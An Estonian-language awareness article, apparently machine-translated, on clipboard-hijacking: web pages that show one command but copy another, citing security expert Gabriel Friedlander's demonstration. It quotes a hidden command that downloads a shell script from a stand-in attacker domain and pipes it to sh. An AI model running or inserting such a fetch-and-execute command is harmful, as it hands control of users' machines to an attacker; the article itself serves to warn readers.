- Me kõik kopeerime ja kleepime igapäevaselt Internetist, teadmata tegelikult riske.
- Turvaekspert võttis seda tehes aega, et näidata kõigile halvimat stsenaariumit.
- Internetist saadud käskude kleepimine terminali on kiire viis häkkimiseks
- Käsud, mida arvasite terminali kleepivat, on tegelikult pahatahtlikud koodid.
On tõsi, et me elame ajastul, kus kiirus on kõik ja kiirete tulemuste saavutamine on oluline. Kuid vähesed inimesed peatuvad hetkeks ja mõtlevad tagajärgede peale.
Miljonid programmeerijad, administraatorid ja turbeuurijad täidavad igapäevaselt lihtsaid ülesandeid, nagu veebilehtedelt käskude kopeerimine ja kleepimine otse oma arvuti konsoolidele.
Kuigi paljud sellele isegi ei mõtle, on tagajärjed suuremad ja ohtlikumad, kui esialgu arvata võiks, eriti kui talletate tundlikke või väärtuslikke andmeid.
Tuntud turvaekspert leidis aja jagamiseks mis tegelikult juhtuda võiks kui kopeerite+kleepite sisu veebilehtedelt.
Kopeeri+kleebi on lihtne viis häkkimiseks
Gabriel Friedlander, kes on turvateadlikkuse koolitusplatvormi Wizer asutaja, tõmbas kaane pealt skeemilt, mis paneb sind enne veebilehtedelt käskude kopeerimist ja kleepimist kaks korda järele mõtlema.
Internetist sisu kopeerimine ja kleepimine on tänapäeval muutunud nii tavaliseks, et keegi ei mõtle sellele isegi.
Siiski hoiatab Friedlander, et mõned veebilehed on petlikumad, kui esmapilgul arvata võiks, ja see, mida arvate, et olete sealt kopeerinud, on väga erinev sellest, mida te tegelikult tegite.
Ja kõige hullem on selle kõige juures see, et ilma vajalike teadmiste või juhendamiseta saavad ohvrid oma veast aru alles pärast teksti kleepimist, misjärel võib olla juba hilja.
Turvaanalüütik mõtles oma ajaveebi lugejatele välja ka väikese testi, et inimesed saaksid tegelikult aru, kui lihtne on teil küberkurjategijatele tahtmatult ust avada.
Ta andis käsu, mis on mõeldud kopeerimiseks, kuid puudutav tõde selgub alles siis, kui kleepite teksti ja vaatate, mida te oma seadistuses tegelikult tutvustasite.
Pärast ülaloleval ekraanipildil näidatud käsu kopeerimist šokeerib selle kleepimise tulemus teid, kuna see on kaugel sellest, mida arvasite kopeerivat.
lokk http://attacker-domain: 8000/shell.sh | shLisaks teie lõikepuhvril olevale täiesti erinevale käsule on reavahetus (või tagastamismärk) at selle lõpp tähendab, et ülaltoodud näide käivitub kohe, kui see on otse Linuxi kleebitud terminal.
Seega on parem olla teadlikum sellest, mis tegelikult toimub, ja käsitleda seda tõsise ohuna. Me ei ütle, et kõik veebisaidid peidavad pahatahtlikku sisu, kuid sellega tasub arvestada.
Kas teid on kunagi häkitud, kuna olete oma terminali kleepinud keerulisi käske? Jagage oma kogemusi meiega allpool olevas kommentaaride jaotises.
